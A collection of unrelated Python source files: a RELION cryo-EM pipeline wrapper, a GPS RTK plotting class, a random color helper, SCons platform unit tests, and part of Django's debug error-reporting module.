# images_command_list.extend(images_msgs(fr.stage_object, fr.job_name))
# if curr_res:
# logger.info(f"Fresh results found for {fr.job_name}")
# if ispyb_command_list:
# logger.info(
# "Sending commands like this: %s", str(ispyb_command_list[0])
# )
# self.recwrap.send_to(
# "ispyb", {"ispyb_command_list": ispyb_command_list}
# )
# logger.info("Sent %d commands to ISPyB", len(ispyb_command_list))
# Should only return results that have not previously been sent
for job_msg in relion_prj.messages:
if job_msg.get("ispyb") and job_msg["ispyb"]:
logger.info(
f"Found results that look like this: {job_msg['ispyb'][0]}"
)
ispyb_command_list.extend(job_msg["ispyb"])
if job_msg.get("images") and job_msg["images"]:
images_command_list.extend(job_msg["images"])
if job_msg.get("images_particles") and job_msg["images_particles"]:
images_particles_command_list.extend(job_msg["images_particles"])
if ispyb_command_list:
# split up multi-part ISPyB messages into chunks of 200 to reduce load on the message broker
multipart_limit = 200
num_msgs = len(ispyb_command_list) // multipart_limit
if len(ispyb_command_list) % multipart_limit:
num_msgs += 1
for imsg in range(num_msgs):
if imsg == num_msgs - 1:
this_msg = ispyb_command_list[multipart_limit * imsg :]
else:
this_msg = ispyb_command_list[
multipart_limit * imsg : multipart_limit * (imsg + 1)
]
logger.info("Sending commands like this: %s", str(this_msg[0]))
self.recwrap.send_to("ispyb", {"ispyb_command_list": this_msg})
logger.info("Sent %d commands to ISPyB", len(this_msg))
for imgcmd in images_command_list:
if imgcmd:
self.recwrap.send_to("images", imgcmd)
for imgcmd in images_particles_command_list:
if imgcmd:
imgcmd.update(
{
"angpix": self.opts.angpix,
"diameter": self.opts.mask_diameter,
}
)
self.recwrap.send_to("images_particles", imgcmd)
### Extract and send Icebreaker results as histograms if the Icebreaker grouping job has run
if not self.opts.stop_after_ctf_estimation and (
self.opts.do_class2d or self.opts.do_class3d
):
attachment_list = []
try:
pdf_file_path = icebreaker_histogram.create_pdf_histogram(
self.working_directory
)
json_file_path = icebreaker_histogram.create_json_histogram(
self.working_directory
)
if should_send_icebreaker and pdf_file_path and json_file_path:
attachment_list.append(
ispyb_attachment(json_file_path, "Graph")
)
attachment_list.append(ispyb_attachment(pdf_file_path, "Graph"))
logger.info(f"Sending ISPyB attachments {attachment_list}")
self.recwrap.send_to(
"ispyb", {"ispyb_command_list": attachment_list}
)
should_send_icebreaker = False
icebreaker_particles_star_file_found = True
except (FileNotFoundError, OSError, RuntimeError, ValueError):
logger.error("Error creating Icebreaker histogram.")
# if Relion has been running too long stop loop of preprocessing jobs
try:
most_recent_movie = max(
p.stat().st_mtime
for p in pathlib.Path(self.params["image_directory"]).glob("**/*")
)
# if a file vanishes for some reason make sure that there is no crash and no exit
except FileNotFoundError:
most_recent_movie = time.time()
# check if all imported files have been motion corrected
# if they have then get the time stamp of the motion correction job
# so that it can be checked all preprocessing jobs have run after it
# only do this if the number of imported files has changed
new_imported_files = relion_prj.get_imported()
if new_imported_files != imported_files or not mc_job_time_all_processed:
imported_files = new_imported_files
mc_job_time_all_processed = self.check_processing_of_imports(
relion_prj, imported_files
)
if len(relion_prj._job_nodes) != 0 and len(relion_prj.preprocess) != 0:
for job in relion_prj.preprocess:
job_end_time = job.environment["end_time_stamp"]
if job_end_time is None:
break
if (
datetime.datetime.timestamp(job_end_time) < most_recent_movie
or job.environment["job_count"] < 1
):
break
# don't need to check if Import job has run recently for this bit
if mc_job_time_all_processed and "Import" not in job.name:
if (
datetime.datetime.timestamp(job_end_time)
< mc_job_time_all_processed
):
preproc_recently_run = False
break
else:
preproc_recently_run = True
currtime = time.time()
if (
currtime - most_recent_movie
> int(self.params["latest_movie_timeout"]) * 60
and currtime - relion_started > 10 * 60
and preprocess_check.is_file()
and preproc_recently_run
and mc_job_time_all_processed
):
logger.info(
f"Ending preprocessing: current time {currtime}, most recent movie {most_recent_movie}, time at which all micrographs were processed {mc_job_time_all_processed}"
)
preprocess_check.unlink()
processing_ended = self.check_whether_ended(relion_prj)
if (
currtime - most_recent_movie
> int(self.params["latest_movie_timeout"]) * 60
and currtime - relion_started > 10 * 60
and all_process_check.is_file()
and processing_ended
and mc_job_time_all_processed
):
logger.info(
f"Ending all processing: current time {currtime}, most recent movie {most_recent_movie}"
)
all_process_check.unlink()
if not icebreaker_particles_star_file_found:
logger.warning("No particles.star file found for Icebreaker grouping.")
logger.info("Done.")
success = False not in [n.environment["status"] for n in relion_prj if n._out]
if preprocess_check.is_file():
preprocess_check.unlink()
if all_process_check.is_file():
all_process_check.unlink()
return success
@staticmethod
def check_processing_of_imports(relion_prj, imported):
try:
checked_key = "job002"
checks = [False for _ in range(len(imported))]
for i, f in enumerate(imported):
keys = [
(j.environment["job"], j)
for j in relion_prj._jobtype_nodes
if j.name == "MotionCorr"
]
for key, job in keys:
if any(
f.split(".")[0] in p.micrograph_name.split(".")[0]
for p in job.environment["result"][key]
):
checks[i] = True
checked_key = key
break
if all(checks):
completion_time = relion_prj._job_nodes.get_by_name(
"MotionCorr/" + checked_key
).environment["end_time_stamp"]
if completion_time:
return datetime.datetime.timestamp(completion_time)
return
except (KeyError, AttributeError, RuntimeError, FileNotFoundError) as e:
logger.debug(
f"Exception encountered while checking whether imported files have been processed: {e}",
exc_info=True,
)
return
def start_relion(self):
print("Running RELION wrapper - stdout")
logger.info("Running RELION wrapper - logger.info")
# Write options to disk for a record of parameters used
options_file = self.working_directory / cryolo_relion_it.OPTIONS_FILE
logger.info(f"Writing all options to {options_file}")
if os.path.isfile(options_file):
logger.info(
f"File {options_file} already exists; renaming old copy to {options_file}~"
)
os.rename(options_file, f"{options_file}~")
with open(options_file, "w") as optfile:
self.opts.print_options(optfile)
success = False
oldpwd = os.getcwd()
try:
os.chdir(self.working_directory)
cryolo_relion_it.run_pipeline(self.opts)
success = True
except Exception as ex:
logger.error(ex)
finally:
os.chdir(oldpwd)
logger.info("Done.")
return success
def check_whether_ended(self, proj):
if len(proj._job_nodes) == 0 or None in [j.environment["status"] for j in proj]:
return False
check_time = time.time()
return all(
check_time - datetime.datetime.timestamp(j.environment["end_time_stamp"])
> 10 * 60
for j in proj
)
def create_synchweb_stop_file(self):
pathlib.Path(self.params["stop_file"]).touch()
def get_status(self, job_path):
relion_stop_files = [
"RELION_JOB_EXIT_SUCCESS",
"RELION_EXIT_FAILURE",
"RELION_JOB_ABORT_NOW",
"RELION_EXIT_ABORTED",
]
# synchweb_stop_files = [synchweb stop files list]
# job_finished_files = [relion job finished files]
for item in relion_stop_files:
if (job_path / item).is_file(): # or synchweb_stop_file exists:
return RelionStatus.SUCCESS
else:
return RelionStatus.RUNNING
# if job_finished_file exists:
@functools.singledispatch
def images_msgs(table, primary_key, **kwargs):
return []
@images_msgs.register(MotionCorrectionTable)
def _(table: MotionCorrectionTable, primary_key: int, **kwargs):
return {
"file": table.get_row_by_primary_key(primary_key)[
"micrograph_snapshot_full_path"
].replace(".jpeg", ".mrc")
}
@images_msgs.register(CTFTable)
def _(table: CTFTable, primary_key: int, **kwargs):
return {
"file": table.get_row_by_primary_key(primary_key)[
"fft_theoretical_full_path"
].replace(".jpeg", ".ctf")
}
@images_msgs.register(ParticleClassificationGroupTable)
def _(table: ParticleClassificationGroupTable, primary_key: int, **kwargs):
image_path = table.get_row_by_primary_key(primary_key)["class_images_stack"]
if not image_path:
return {}
return {"file": image_path, "all_frames": "true"}
@functools.singledispatch
def images_particles_msgs(table, primary_key, **kwargs):
return []
@images_particles_msgs.register(ParticlePickerTable)
def _(table: ParticlePickerTable, primary_key: int, **kwargs):
mc_image_path = table.get_row_by_primary_key(primary_key)[
"mc_image_full_path"
].replace(".jpeg", ".mrc")
parpick_image_path = table.get_row_by_primary_key(primary_key)[
"summary_image_full_path"
]
if not mc_image_path or not parpick_image_path:
return {}
coords = table.get_row_by_primary_key(primary_key)["particle_coordinates"]
return {"file": mc_image_path, "outfile": parpick_image_path, "coordinates": coords}
@functools.singledispatch
def construct_message(table, primary_key, resend=False, unsent_appended=None):
raise ValueError(f"{table!r} is not a known Table")
@construct_message.register(MotionCorrectionTable)
def _(
table: MotionCorrectionTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
drift_data = row["drift_data"]
buffered = ["motion_correction_id", "drift_data"]
buffer_store = row["motion_correction_id"]
drift_frames = [(frame.frame, frame.deltaX, frame.deltaY) for frame in drift_data]
results = {
"ispyb_command": "buffer",
"buffer_command": {
"ispyb_command": "insert_motion_correction",
**{k: v for k, v in row.items() if k not in buffered},
"drift_frames": drift_frames,
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(CTFTable)
def _(
table: CTFTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["motion_correction_id", "ctf_id"]
buffer_store = row["ctf_id"]
buffer_lookup = row["motion_correction_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
"ctf_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_ctf",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_ctf",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(ParticlePickerTable)
def _(
table: ParticlePickerTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = [
"first_motion_correction_id",
"particle_picker_id",
"particle_coordinates",
]
buffer_store = row["particle_picker_id"]
buffer_lookup = row["first_motion_correction_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
"particle_picker_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_particle_picker",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_particle_picker",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(ParticleClassificationGroupTable)
def _(
table: ParticleClassificationGroupTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["particle_picker_id", "particle_classification_group_id"]
buffer_store = row["particle_classification_group_id"]
buffer_lookup = row["particle_picker_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_picker_id": buffer_lookup,
"particle_classification_group_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification_group",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_picker_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification_group",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(ParticleClassificationTable)
def _(
table: ParticleClassificationTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["particle_classification_group_id", "particle_classification_id"]
buffer_store = row["particle_classification_id"]
buffer_lookup = row["particle_classification_group_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_group_id": buffer_lookup,
"particle_classification_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_group_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(CryoemInitialModelTable)
def _(
table: CryoemInitialModelTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
if unsent_appended is None:
unsent_appended = {}
row = table.get_row_by_primary_key(primary_key)
class_ids = unsent_appended.get("particle_classification_id", [])
# class_ids = row["particle_classification_id"]
buffer_store = row["cryoem_initial_model_id"]
if not isinstance(class_ids, list):
class_ids = [class_ids]
results = []
if resend:
for i, class_id in enumerate(class_ids):
buffered = ["particle_classification_id", "cryoem_initial_model_id"]
this_result = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_id": class_id,
"cryoem_initial_model_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_cryoem_initial_model",
**{k: v for k, v in row.items() if k not in buffered},
},
}
results.append(this_result)
else:
for i, class_id in enumerate(class_ids):
buffered = ["particle_classification_id", "cryoem_initial_model_id"]
this_result = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_id": class_id,
},
"buffer_command": {
"ispyb_command": "insert_cryoem_initial_model",
**{k: v for k, v in row.items() if k not in buffered},
},
}
if i == 0:
this_result["buffer_store"] = buffer_store
else:
this_result["buffer_lookup"]["cryoem_initial_model_id"] = buffer_store
results.append(this_result)
return results
@construct_message.register(RelativeIceThicknessTable)
def _(
table: RelativeIceThicknessTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["motion_correction_id", "relative_ice_thickness_id"]
buffer_store = row["relative_ice_thickness_id"]
buffer_lookup = row["motion_correction_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
"relative_ice_thickness_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_relative_ice_thickness",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_relative_ice_thickness",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
def ispyb_attachment(attachment_path_object, file_type):
return {
"ispyb_command": "add_program_attachment",
"file_name": os.fspath(attachment_path_object.name),
"file_path": os.fspath(attachment_path_object.parent),
"file_type": file_type,
}
|
the-stack_0_25191
|
import math
import numpy as np
import matplotlib.pyplot as plt
from nclt2ros.visualizer.plotter import Plotter
from nclt2ros.transformer.coordinate_frame import CoordinateFrame
class GPS_RTK(Plotter):
"""Class to visualize the GPS RTK data as a kml and png file
USAGE:
GPS_RTK(date='2013-01-10', output_file='gps_rtk', plt_show=True)
"""
def __init__(self, date, output_file='gps_rtk', plt_show=True):
if isinstance(output_file, str):
self.output_file = output_file
else:
raise TypeError("'output_file' must be type of string")
self.date = date
self.plt_show = plt_show
# init base class
Plotter.__init__(self, date=self.date)
# transform coordinate frame into 'odom' or 'gt'
if self.date == '2013-01-10':
self.gps_rtk_converter = CoordinateFrame(origin='odom')
else:
self.gps_rtk_converter = CoordinateFrame(origin='gt')
# load data
self.gps_rtk = self.reader.read_gps_rtk_csv(all_in_one=True)
def save_kml_line(self):
"""visualize the gps rtk data as a kml file
"""
lat = self.gps_rtk[:, 3]
lng = self.gps_rtk[:, 4]
gps_rtk_list = list()
for (i_lat, j_lng) in zip(lat, lng):
if not math.isnan(i_lat) and not math.isnan(j_lng):
tup = (np.rad2deg(j_lng), np.rad2deg(i_lat)) # swap and convert lat long to deg
gps_rtk_list.append(tup)
ls = self.kml.newlinestring(name="gps rtk", coords=gps_rtk_list, description="latitude and longitude from gps rtk")
ls.style.linestyle.width = 1
ls.style.linestyle.color = self.red
self.kml.save(self.visualization_kml_dir + self.output_file + '.kml')
def get_gps_rtk_data(self):
"""get gps rtk data for visualization
:return: list for x coordinates, list for y coordinates
"""
lat = self.gps_rtk[:, 3]
lng = self.gps_rtk[:, 4]
x_list = list()
y_list = list()
for (i_lat, j_lng) in zip(lat, lng):
if not math.isnan(i_lat) and not math.isnan(j_lng):
x = self.gps_rtk_converter.get_x(lat=np.rad2deg(i_lat))
y = self.gps_rtk_converter.get_y(lon=np.rad2deg(j_lng))
x_list.append(x)
y_list.append(y)
return x_list, y_list
def save_gps_rtk_png(self):
"""visualize the gps rtk data as a png file
"""
x_list, y_list = self.get_gps_rtk_data()
plt.plot(y_list, x_list, 'r-', label='gps rtk')
plt.title('GPS RTK')
plt.xlabel('x in meter')
plt.ylabel('y in meter')
plt.legend(loc='upper left')
plt.grid()
plt.savefig(self.visualization_png_gps_rtk_dir + 'gps_rtk.png')
if self.plt_show:
plt.show()
def get_png_gps_rtk_dir(self):
"""get the png gps rtk directory
:return: path to png gps rtk directory
"""
return self.visualization_png_gps_rtk_dir
if __name__ == '__main__':
gps = GPS_RTK(date='2012-01-08')
gps.save_gps_rtk_png()
|
the-stack_0_25193
|
import random
LIST_COLORS = []
def remove_color(doppelganger):
if doppelganger in LIST_COLORS:
LIST_COLORS.remove(doppelganger)
def hex_code_colors():
z = ''
while z not in LIST_COLORS:
a = hex(random.randrange(0,256))
b = hex(random.randrange(0,256))
c = hex(random.randrange(0,256))
a = a[2:]
b = b[2:]
c = c[2:]
if len(a)<2:
a = "0" + a
if len(b)<2:
b = "0" + b
if len(c)<2:
c = "0" + c
x = a + b + c
z = "#" + x
if z in LIST_COLORS:
continue
if z == "#000000" or z == "#FFFFFF":
continue
LIST_COLORS.append(z)
return z
def generateRandomColor(r, g, b):
red = random.randint(0, 256)
green = random.randint(0,256)
blue = random.randint(0, 256)
if r and g and b:
red = int((red + r) / 2)
green = int((green + g) / 2)
blue = int((blue + b) / 2)
LIST_COLORS.append('#%02x%02x%02x' % (red, green, blue))
return '#%02x%02x%02x' % (red, green, blue)
|
the-stack_0_25194
|
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import collections
import unittest
import os
import SCons.compat
import SCons.Errors
import SCons.Platform
import SCons.Environment
import SCons.Action
class Environment(collections.UserDict):
def Detect(self, cmd):
return cmd
def AppendENVPath(self, key, value):
pass
class PlatformTestCase(unittest.TestCase):
def test_Platform(self):
"""Test the Platform() function"""
p = SCons.Platform.Platform('cygwin')
assert str(p) == 'cygwin', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '.exe', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('os2')
assert str(p) == 'os2', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '.exe', env
assert env['LIBSUFFIX'] == '.lib', env
p = SCons.Platform.Platform('posix')
assert str(p) == 'posix', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('irix')
assert str(p) == 'irix', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('aix')
assert str(p) == 'aix', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('sunos')
assert str(p) == 'sunos', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('hpux')
assert str(p) == 'hpux', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('win32')
assert str(p) == 'win32', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '.exe', env
assert env['LIBSUFFIX'] == '.lib', env
exc_caught = None
try:
p = SCons.Platform.Platform('_does_not_exist_')
except SCons.Errors.UserError:
exc_caught = 1
assert exc_caught, "did not catch expected UserError"
env = Environment()
SCons.Platform.Platform()(env)
assert env != {}, env
class TempFileMungeTestCase(unittest.TestCase):
def test_MAXLINELENGTH(self):
""" Test different values for MAXLINELENGTH with the same
size command string to ensure that the temp file mechanism
kicks in only at MAXLINELENGTH+1, or higher
"""
# Init class with cmd, such that the fully expanded
# string reads "a test command line".
# Note, how we're using a command string here that is
# actually longer than the substituted one. This is to ensure
# that the TempFileMunge class internally really takes the
# length of the expanded string into account.
defined_cmd = "a $VERY $OVERSIMPLIFIED line"
t = SCons.Platform.TempFileMunge(defined_cmd)
env = SCons.Environment.SubstitutionEnvironment(tools=[])
# Setting the line length high enough...
env['MAXLINELENGTH'] = 1024
env['VERY'] = 'test'
env['OVERSIMPLIFIED'] = 'command'
expanded_cmd = env.subst(defined_cmd)
# Call the tempfile munger
cmd = t(None, None, env, 0)
assert cmd == defined_cmd, cmd
# Let MAXLINELENGTH equal the string's length
env['MAXLINELENGTH'] = len(expanded_cmd)
cmd = t(None, None, env, 0)
assert cmd == defined_cmd, cmd
# Finally, let the actual tempfile mechanism kick in
# Disable printing of actions...
old_actions = SCons.Action.print_actions
SCons.Action.print_actions = 0
env['MAXLINELENGTH'] = len(expanded_cmd)-1
cmd = t(None, None, env, 0)
# ...and restoring its setting.
SCons.Action.print_actions = old_actions
assert cmd != defined_cmd, cmd
def test_TEMPFILEARGJOINBYTE(self):
"""
Test argument join byte TEMPFILEARGJOINBYTE
"""
# Init class with cmd, such that the fully expanded
# string reads "a test command line".
# Note, how we're using a command string here that is
# actually longer than the substituted one. This is to ensure
# that the TempFileMunge class internally really takes the
# length of the expanded string into account.
defined_cmd = "a $VERY $OVERSIMPLIFIED line"
t = SCons.Platform.TempFileMunge(defined_cmd)
env = SCons.Environment.SubstitutionEnvironment(tools=[])
# Setting the line length high enough...
env['MAXLINELENGTH'] = 1024
env['VERY'] = 'test'
env['OVERSIMPLIFIED'] = 'command'
env['TEMPFILEARGJOINBYTE'] = os.linesep
expanded_cmd = env.subst(defined_cmd)
# For tempfilemunge to operate.
old_actions = SCons.Action.print_actions
SCons.Action.print_actions = 0
env['MAXLINELENGTH'] = len(expanded_cmd)-1
cmd = t(None, None, env, 0)
# print("CMD is:%s"%cmd)
with open(cmd[-1],'rb') as f:
file_content = f.read()
# print("Content is:[%s]"%file_content)
# ...and restoring its setting.
SCons.Action.print_actions = old_actions
assert file_content != env['TEMPFILEARGJOINBYTE'].join(['test','command','line'])
def test_tempfilecreation_once(self):
"""
Init class with cmd, such that the fully expanded
string reads "a test command line".
Note, how we're using a command string here that is
actually longer than the substituted one. This is to ensure
that the TempFileMunge class internally really takes the
length of the expanded string into account.
"""
defined_cmd = "a $VERY $OVERSIMPLIFIED line"
t = SCons.Platform.TempFileMunge(defined_cmd)
env = SCons.Environment.SubstitutionEnvironment(tools=[])
# Setting the line length high enough...
env['VERY'] = 'test'
env['OVERSIMPLIFIED'] = 'command'
expanded_cmd = env.subst(defined_cmd)
env['MAXLINELENGTH'] = len(expanded_cmd)-1
# Disable printing of actions...
old_actions = SCons.Action.print_actions
SCons.Action.print_actions = 0
# Create an instance of object derived class to allow setattrb
class Node:
class Attrs:
pass
def __init__(self):
self.attributes = self.Attrs()
target = [Node()]
cmd = t(target, None, env, 0)
# ...and restoring its setting.
SCons.Action.print_actions = old_actions
assert cmd != defined_cmd, cmd
assert cmd == target[0].attributes.tempfile_cmdlist[defined_cmd]
class PlatformEscapeTestCase(unittest.TestCase):
def test_posix_escape(self):
""" Check that paths with parens are escaped properly
"""
import SCons.Platform.posix
test_string = "/my (really) great code/main.cpp"
output = SCons.Platform.posix.escape(test_string)
# We expect the escape function to wrap the string
# in quotes, but not escape any internal characters
# in the test_string. (Parens doesn't require shell
# escaping if their quoted)
assert output[1:-1] == test_string
if __name__ == "__main__":
unittest.main()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_0_25196
|
from __future__ import unicode_literals
import re
import sys
import types
from django.conf import settings
from django.http import HttpResponse, HttpResponseNotFound
from django.template import Context, Engine, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.urls import Resolver404, resolve
from django.utils import lru_cache, six, timezone
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
# Minimal Django templates engine to render the error templates
# regardless of the project's TEMPLATES setting.
DEBUG_ENGINE = Engine(debug=True)
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE', flags=re.IGNORECASE)
CLEANSED_SUBSTITUTE = '********************'
class CallableSettingWrapper(object):
""" Object to wrap callable appearing in settings
* Not to call in the debug page (#21345).
* Not to break the debug page if the callable forbidding to set attributes (#23070).
"""
def __init__(self, callable_setting):
self._wrapped = callable_setting
def __repr__(self):
return repr(self._wrapped)
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = {k: cleanse_setting(k, v) for k, v in value.items()}
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
if callable(cleansed):
# For fixing #21345 and #23070
cleansed = CallableSettingWrapper(cleansed)
return cleansed
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb, status_code=500):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponse(text, status=status_code, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponse(html, status=status_code, content_type='text/html')
@lru_cache.lru_cache()
def get_default_exception_reporter_filter():
# Instantiate the default filter for the first time and cache it.
return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
def get_exception_reporter_filter(request):
default_filter = get_default_exception_reporter_filter()
return getattr(request, 'exception_reporter_filter', default_filter)
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(tb_frame.f_locals.items())
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
try:
# If value is lazy or a complex object of another kind, this check
# might raise an exception. isinstance checks that lazy
# MultiValueDicts will have a return value.
is_multivalue_dict = isinstance(value, MultiValueDict)
except Exception as e:
return '{!r} while evaluating {!r}'.format(e, value)
if is_multivalue_dict:
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper' and
'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
